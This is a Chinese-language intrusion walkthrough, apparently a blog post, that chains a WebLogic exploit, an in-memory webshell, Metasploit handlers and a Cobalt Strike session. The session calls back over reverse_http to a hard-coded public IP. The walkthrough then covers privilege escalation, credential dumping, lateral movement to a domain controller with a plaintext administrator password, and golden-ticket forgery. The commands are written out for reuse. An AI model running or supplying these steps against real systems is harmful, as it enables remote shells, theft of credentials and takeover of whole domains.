1. 首先发现 weblogic 漏洞,直接打开工具一把梭,上传内存马,哥斯拉连接

2. 打开 cs 设置一个监听器,vps 为服务器 ip

3.msf 开启监听

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf5 exploit(multi/handler) > set lport 11111
lport => 11111
msf5 exploit(multi/handler) > run

4. 哥斯拉一键反弹 shell

5. 直接命令派生到 cs

background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 117.50.196.44
set lport 81
set session 1
run
//session会变

6.cs 成功上线

7. 提权,右键上线目标

8. 成功新上线 system 权限

9. 抓取远程服务密码

10. 成功抓取到 DC 域的账号密码

11. 直接登陆

12. 横向移动,直接在 cs 操作

rev2self
make_token delay.com\Administrator Aa@123456
jump psexec DC 1

13. 直接横向成功

14. 黄金票据的伪造
(1) hashdump 获取 hash 数

(2) 获取域 SID

(3) 右键添加黄金票据

(4) 直接输入 SID,Hash

(5) 成功创建

### 参考:
https://blog.csdn.net/qq_45780190/article/details/123156086